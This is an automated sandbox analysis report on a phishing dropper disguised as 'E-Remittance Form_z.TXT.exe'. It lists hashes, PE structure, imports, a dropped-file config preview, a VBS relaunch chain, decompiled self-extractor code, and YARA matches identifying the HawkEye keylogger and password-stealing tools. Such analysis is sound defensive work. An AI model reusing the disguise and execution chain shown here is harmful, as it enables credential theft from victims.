                          SHA-256:552015B135E3564DCDDBBDF1DF5BCEF916CD1729352624CE65904877FD19844C
                          SHA-512:53B38EB5059C0B0F88B26B6CDC74C33D4C5E4B6B1B409E86640AB6253B612B1AFE3E48D038ABFE703860B1CBC47A8530EEC06B176BE7846E094C28474917B734
                          Malicious:false
                          Preview: [S3tt!ng]..stpth=%temp%..Key=..Dir3ctory=82139548..ExE_c=urdavsa.pif..

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.775012373250531
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:E-Remittance Form_z.TXT.exe
                          File size:1441541
                          MD5:0c3bdc11fd6454bb67da849864170b44
                          SHA1:1c925518e075761758a47f677016c95f5e80c92c
                          SHA256:bdade907a458b6c9d2e87af5667c3b8a16aa7804535634ed662b0e07c34f64b1
                          SHA512:b75c5e2967976c5df69b7ad438b9dc26b68accd1fe707575f396b3926e16c99dbf7fd4f30815430e5160461793de9f7897bc2660307f94aa8795a01220b7ad9b
                          SSDEEP:24576:rAOcZAh8BbGTd6g+HrTWCGMnuce4hXQoVUsywK6ULRrAPWcBfhNQXNmrKb:taRov+LCuug7VU4KVrAPWLIrKb
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'..

                          File Icon

                          Icon Hash:f1fce4e630f0b0b0

                          Static PE Info

                          General

                          Entrypoint:0x41e1f9
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x5E7C7DC7 [Thu Mar 26 10:02:47 2020 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                          Entrypoint Preview

                          Instruction
                          call 00007F1D88A72CCFh
                          jmp 00007F1D88A726C3h
                          cmp ecx, dword ptr [0043D668h]
                          jne 00007F1D88A72835h
                          ret
                          jmp 00007F1D88A72E45h
                          ret
                          and dword ptr [ecx+04h], 00000000h
                          mov eax, ecx
                          and dword ptr [ecx+08h], 00000000h
                          mov dword ptr [ecx+04h], 00433068h
                          mov dword ptr [ecx], 00434284h
                          ret
                          push ebp
                          mov ebp, esp
                          push esi
                          push dword ptr [ebp+08h]
                          mov esi, ecx
                          call 00007F1D88A65C41h
                          mov dword ptr [esi], 00434290h
                          mov eax, esi
                          pop esi
                          pop ebp
                          retn 0004h
                          and dword ptr [ecx+04h], 00000000h
                          mov eax, ecx
                          and dword ptr [ecx+08h], 00000000h
                          mov dword ptr [ecx+04h], 00434298h
                          mov dword ptr [ecx], 00434290h
                          ret
                          lea eax, dword ptr [ecx+04h]
                          mov dword ptr [ecx], 00434278h
                          push eax
                          call 00007F1D88A759DDh
                          pop ecx
                          ret
                          push ebp
                          mov ebp, esp
                          push esi
                          mov esi, ecx
                          lea eax, dword ptr [esi+04h]
                          mov dword ptr [esi], 00434278h
                          push eax
                          call 00007F1D88A759C6h
                          test byte ptr [ebp+08h], 00000001h
                          pop ecx
                          je 00007F1D88A7283Ch
                          push 0000000Ch
                          push esi
                          call 00007F1D88A71DFFh
                          pop ecx
                          pop ecx
                          mov eax, esi
                          pop esi
                          pop ebp
                          retn 0004h
                          push ebp
                          mov ebp, esp
                          sub esp, 0Ch
                          lea ecx, dword ptr [ebp-0Ch]
                          call 00007F1D88A7279Eh
                          push 0043A410h
                          lea eax, dword ptr [ebp-0Ch]
                          push eax
                          call 00007F1D88A750C5h
                          int3
                          push ebp
                          mov ebp, esp
                          sub esp, 0Ch

                          Rich Headers

                          Programming Language:
                          • [ C ] VS2008 SP1 build 30729
                          • [EXP] VS2015 UPD3.1 build 24215
                          • [LNK] VS2015 UPD3.1 build 24215
                          • [IMP] VS2008 SP1 build 30729
                          • [C++] VS2015 UPD3.1 build 24215
                          • [RES] VS2015 UPD3 build 24213

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x3b5400x34.rdata
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3b5740x3c.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x4c28.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x670000x210c.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x397d00x54.rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x342180x40.rdata
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x320000x260.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3aaec0x120.rdata
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x305810x30600False0.589268410853data6.70021125825IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .rdata0x320000xa3320xa400False0.455030487805data5.23888424127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x3d0000x238b00x1200False0.368272569444data3.83993526939IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .gfids0x610000xe80x200False0.333984375data2.12166381533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc0x620000x4c280x4e00False0.600210336538data6.36873857062IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x670000x210c0x2200False0.786534926471data6.61038519378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountry
                          PNG0x625240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
                          PNG0x6306c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
                          RT_ICON0x646180x2e8data
                          RT_DIALOG0x649000x286dataEnglishUnited States
                          RT_DIALOG0x64b880x13adataEnglishUnited States
                          RT_DIALOG0x64cc40xecdataEnglishUnited States
                          RT_DIALOG0x64db00x12edataEnglishUnited States
                          RT_DIALOG0x64ee00x338dataEnglishUnited States
                          RT_DIALOG0x652180x252dataEnglishUnited States
                          RT_STRING0x6546c0x1e2dataEnglishUnited States
                          RT_STRING0x656500x1ccdataEnglishUnited States
                          RT_STRING0x6581c0x1b8dataEnglishUnited States
                          RT_STRING0x659d40x146Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500EnglishUnited States
                          RT_STRING0x65b1c0x446dataEnglishUnited States
                          RT_STRING0x65f640x166dataEnglishUnited States
                          RT_STRING0x660cc0x152dataEnglishUnited States
                          RT_STRING0x662200x10adataEnglishUnited States
                          RT_STRING0x6632c0xbcdataEnglishUnited States
                          RT_STRING0x663e80xd6dataEnglishUnited States
                          RT_GROUP_ICON0x664c00x14data
                          RT_MANIFEST0x664d40x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                          Imports

                          DLLImport
                          KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                          gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          No network behavior found

                          Code Manipulations

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          Analysis Process: E-Remittance Form_z.TXT.exe PID: 5956 Parent PID: 5868

                          General

                          Start time:10:47:56
                          Start date:14/08/2021
                          Path:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe'
                          Imagebase:0x9e0000
                          File size:1441541 bytes
                          MD5 hash:0C3BDC11FD6454BB67DA849864170B44
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Chronological Activities

                          Analysis Process: urdavsa.pif PID: 3588 Parent PID: 5956

                          General

                          Start time:10:48:02
                          Start date:14/08/2021
                          Path:C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif
                          Wow64 process (32bit):true
                          Commandline:'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg
                          Imagebase:0xa90000
                          File size:662256 bytes
                          MD5 hash:CDBB08D4234736C4A052DC3F181E66F2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 34%, Metadefender, Browse
                          • Detection: 46%, ReversingLabs
                          Reputation:low

                          Chronological Activities

                          Analysis Process: wscript.exe PID: 2520 Parent PID: 3588

                          General

                          Start time:10:48:28
                          Start date:14/08/2021
                          Path:C:\Windows\SysWOW64\wscript.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs'
                          Imagebase:0x11b0000
                          File size:147456 bytes
                          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: urdavsa.pif PID: 5708 Parent PID: 2520

                          General

                          Start time:10:48:32
                          Start date:14/08/2021
                          Path:C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif
                          Wow64 process (32bit):true
                          Commandline:'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg
                          Imagebase:0xa90000
                          File size:662256 bytes
                          MD5 hash:CDBB08D4234736C4A052DC3F181E66F2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Chronological Activities

                          Analysis Process: wscript.exe PID: 5564 Parent PID: 5708

                          General

                          Start time:10:49:01
                          Start date:14/08/2021
                          Path:C:\Windows\SysWOW64\wscript.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs'
                          Imagebase:0x11b0000
                          File size:147456 bytes
                          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: urdavsa.pif PID: 2232 Parent PID: 5564

                          General

                          Start time:10:49:03
                          Start date:14/08/2021
                          Path:C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif
                          Wow64 process (32bit):true
                          Commandline:'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg
                          Imagebase:0xa90000
                          File size:662256 bytes
                          MD5 hash:CDBB08D4234736C4A052DC3F181E66F2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Chronological Activities

                          Analysis Process: wscript.exe PID: 1360 Parent PID: 2232

                          General

                          Start time:10:49:30
                          Start date:14/08/2021
                          Path:C:\Windows\SysWOW64\wscript.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs'
                          Imagebase:0x11b0000
                          File size:147456 bytes
                          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: urdavsa.pif PID: 5552 Parent PID: 1360

                          General

                          Start time:10:49:32
                          Start date:14/08/2021
                          Path:C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif
                          Wow64 process (32bit):true
                          Commandline:'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg
                          Imagebase:0xa90000
                          File size:662256 bytes
                          MD5 hash:CDBB08D4234736C4A052DC3F181E66F2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000019.00000003.580526774.0000000004A10000.00000004.00000001.sdmp, Author: Florian Roth
                          • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000019.00000003.580526774.0000000004A10000.00000004.00000001.sdmp, Author: Joe Security
                          Reputation:low

                          Chronological Activities

                          Analysis Process: RegSvcs.exe PID: 4684 Parent PID: 5552

                          General

                          Start time:10:50:00
                          Start date:14/08/2021
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Imagebase:0x5b0000
                          File size:45152 bytes
                          MD5 hash:2867A3817C9245F7CF518524DFD18F28
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 0000001C.00000002.584515573.0000000000982000.00000040.00000001.sdmp, Author: Florian Roth
                          • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.584515573.0000000000982000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmp, Author: Florian Roth
                          • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmp, Author: Florian Roth
                          • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000003.582261171.0000000004A95000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000003.582261171.0000000004A95000.00000004.00000001.sdmp, Author: Joe Security
                          Reputation:high

                          Chronological Activities

                          Disassembly

                          Code Analysis

                          Reset < >

                            Analysis Process: E-Remittance Form_z.TXT.exe PID: 5956 Parent PID: 5868 E-Remittance Form_z.TXT.exeCOMMON

                            Executed Functions

                            Function 009FCBB8, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 199filesleeptimeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 17%
                            			E009FCBB8(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t95;
				struct HINSTANCE__* _t97;
				intOrPtr _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t125;

				_t125 = __fp0;
				_t89 = __edx;
				E009EFD49(__edx, 1);
				E009F95F8("C:\Users\engineer\Desktop", 0x800);
				E009F9AA0( &_v208); // executed
				E009F1017(0xa27370);
				_t74 = 0;
				E009FE920(0x7104, 0xa35d08, 0, 0x7104);
				_t106 = _t105 + 0xc;
				_t95 = GetCommandLineW();
				_t110 = _t95;
				if(_t95 != 0) {
					_push(_t95);
					E009FB356(0, _t110);
					if( *0xa29601 == 0) {
						E009FC891(__eflags, _t95); // executed
					} else {
						_t103 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t103 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t103);
					}
				}
				GetModuleFileNameW(_t74, 0xa3ce18, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0xa3ce18);
				GetLocalTime(_t106 + 0xc);
				_push( *(_t106 + 0x1a) & 0x0000ffff);
				_push( *(_t106 + 0x1c) & 0x0000ffff);
				_push( *(_t106 + 0x1e) & 0x0000ffff);
				_push( *(_t106 + 0x20) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				E009E3E41(_t106 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t106 + 0x24) & 0x0000ffff);
				_t107 = _t106 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t107 + 0x7c);
				_t97 = GetModuleHandleW(_t74);
				 *0xa20064 = _t97;
				 *0xa20060 = _t97; // executed
				_t41 = LoadIconW(_t97, 0x64); // executed
				 *0xa2b704 = _t41;
				 *0xa35d04 = E009FA4F8(_t89, _t125);
				E009ECFAB(0xa20078, _t89, 0xa3ce18);
				E009F83FC(0);
				E009F83FC(0);
				 *0xa275e8 = _t107 + 0x5c;
				 *0xa275ec = _t107 + 0x30; // executed
				DialogBoxParamW(_t97, L"STARTDLG", _t74, E009FA5D1, _t74); // executed
				 *0xa275ec = _t74;
				 *0xa275e8 = _t74;
				E009F84AE(_t107 + 0x24);
				E009F84AE(_t107 + 0x50);
				_t51 =  *0xa3de28;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0xa285f8 != 0) {
					E009F9CA1(0xa3ce18);
				}
				E009EE797(0xa35c00);
				if( *0xa275e4 > 0) {
					L00A02B4E( *0xa275e0);
				}
				DeleteObject( *0xa2b704);
				_t54 =  *0xa35d04;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0xa200e0 == 0 &&  *0xa275d7 != 0) {
					E009E6E03(0xa200e0, 0xff);
				}
				_t55 =  *0xa3de2c;
				 *0xa275d7 = 1;
				if( *0xa3de2c != 0) {
					E009FC8F0(_t55);
					CloseHandle( *0xa3de2c);
				}
				_t99 =  *0xa200e0; // 0x0
				if( *0xa3de21 != 0) {
					_t58 =  *0xa1d5fc; // 0x3e8
					if( *0xa3de22 == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t99 = _t99 - _t58;
							__eflags = _t99;
						}
					} else {
						_t99 =  *0xa3de24;
						if(_t58 > 0) {
							_t99 = _t99 + _t58;
						}
					}
				}
				E009F9B08(_t107 + 0x1c); // executed
				return _t99;
			}




















                            0x009fcbb8
                            0x009fcbb8
                            0x009fcbc3
                            0x009fcbd2
                            0x009fcbdb
                            0x009fcbe5
                            0x009fcbef
                            0x009fcbf8
                            0x009fcbfd
                            0x009fcc06
                            0x009fcc08
                            0x009fcc0a
                            0x009fcc0c
                            0x009fcc0d
                            0x009fcc18
                            0x009fcc85
                            0x009fcc1a
                            0x009fcc2d
                            0x009fcc31
                            0x009fcc72
                            0x009fcc78
                            0x009fcc78
                            0x009fcc7b
                            0x009fcc81
                            0x009fcc18
                            0x009fcc96
                            0x009fcca8
                            0x009fccaf
                            0x009fccba
                            0x009fccc0
                            0x009fccc6
                            0x009fcccc
                            0x009fccd2
                            0x009fccd8
                            0x009fccee
                            0x009fccf3
                            0x009fcd00
                            0x009fcd09
                            0x009fcd0e
                            0x009fcd14
                            0x009fcd1a
                            0x009fcd20
                            0x009fcd30
                            0x009fcd35
                            0x009fcd3e
                            0x009fcd47
                            0x009fcd57
                            0x009fcd66
                            0x009fcd6b
                            0x009fcd75
                            0x009fcd7b
                            0x009fcd81
                            0x009fcd8a
                            0x009fcd8f
                            0x009fcd96
                            0x009fcd99
                            0x009fcd99
                            0x009fcda6
                            0x009fcda8
                            0x009fcda8
                            0x009fcdb2
                            0x009fcdbe
                            0x009fcdc6
                            0x009fcdcb
                            0x009fcdd8
                            0x009fcdda
                            0x009fcde1
                            0x009fcde4
                            0x009fcde4
                            0x009fcded
                            0x009fce02
                            0x009fce02
                            0x009fce07
                            0x009fce0c
                            0x009fce15
                            0x009fce18
                            0x009fce23
                            0x009fce23
                            0x009fce30
                            0x009fce36
                            0x009fce3f
                            0x009fce44
                            0x009fce54
                            0x009fce56
                            0x009fce58
                            0x009fce58
                            0x009fce58
                            0x009fce46
                            0x009fce46
                            0x009fce4e
                            0x009fce50
                            0x009fce50
                            0x009fce4e
                            0x009fce44
                            0x009fce5e
                            0x009fce6e

                            APIs
                              • Part of subcall function 009EFD49: GetModuleHandleW.KERNEL32 ref: 009EFD61
                              • Part of subcall function 009EFD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009EFD79
                              • Part of subcall function 009EFD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009EFD9C
                              • Part of subcall function 009F95F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 009F9600
                              • Part of subcall function 009F9AA0: OleInitialize.OLE32(00000000), ref: 009F9AB9
                              • Part of subcall function 009F9AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 009F9AF0
                              • Part of subcall function 009F9AA0: SHGetMalloc.SHELL32(00A275C0), ref: 009F9AFA
                              • Part of subcall function 009F1017: GetCPInfo.KERNEL32(00000000,?), ref: 009F1028
                              • Part of subcall function 009F1017: IsDBCSLeadByte.KERNEL32(00000000), ref: 009F103C
                            • GetCommandLineW.KERNEL32 ref: 009FCC00
                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 009FCC27
                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 009FCC38
                            • UnmapViewOfFile.KERNEL32(00000000), ref: 009FCC72
                              • Part of subcall function 009FC891: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 009FC8A7
                              • Part of subcall function 009FC891: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 009FC8E3
                            • CloseHandle.KERNEL32(00000000), ref: 009FCC7B
                            • GetModuleFileNameW.KERNEL32(00000000,00A3CE18,00000800), ref: 009FCC96
                            • SetEnvironmentVariableW.KERNEL32(sfxname,00A3CE18), ref: 009FCCA8
                            • GetLocalTime.KERNEL32(?), ref: 009FCCAF
                            • _swprintf.LIBCMT ref: 009FCCEE
                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 009FCD00
                            • GetModuleHandleW.KERNEL32(00000000), ref: 009FCD03
                            • LoadIconW.USER32(00000000,00000064), ref: 009FCD1A
                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 009FCD6B
                            • Sleep.KERNEL32(?), ref: 009FCD99
                            • DeleteObject.GDI32 ref: 009FCDD8
                            • DeleteObject.GDI32(?), ref: 009FCDE4
                            • CloseHandle.KERNEL32 ref: 009FCE23
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                            • API String ID: 788466649-277078469
                            • Opcode ID: b340ddffaac7ae59b8ddc5fc957fb7ffe8615c15856a5642de64c1fcba9a5ea7
                            • Instruction ID: 844eda90e24053ac1e2c11f8b26aab570f2b6a26453980e80d9b82a694a2fc29
                            • Opcode Fuzzy Hash: b340ddffaac7ae59b8ddc5fc957fb7ffe8615c15856a5642de64c1fcba9a5ea7
                            • Instruction Fuzzy Hash: B761E6B1504218ABD720EBB9EC49F7B7BACAB88700F004839FA45971A1DB74DD46C761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F963A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 92memorywindowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 67%
                            			E009F963A(WCHAR* _a4) {
				WCHAR* _v4;
				intOrPtr _v8;
				intOrPtr* _v16;
				char _v20;
				void* __ecx;
				struct HRSRC__* _t14;
				WCHAR* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t30;
				long _t32;
				void* _t34;
				intOrPtr* _t35;
				void* _t40;
				struct HRSRC__* _t42;
				intOrPtr* _t44;

				_t14 = FindResourceW( *0xa20060, _a4, "PNG");
				_t42 = _t14;
				if(_t42 == 0) {
					return _t14;
				}
				_t32 = SizeofResource( *0xa20060, _t42);
				if(_t32 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0xa20060, _t42);
				if(_t17 == 0) {
					goto L4;
				}
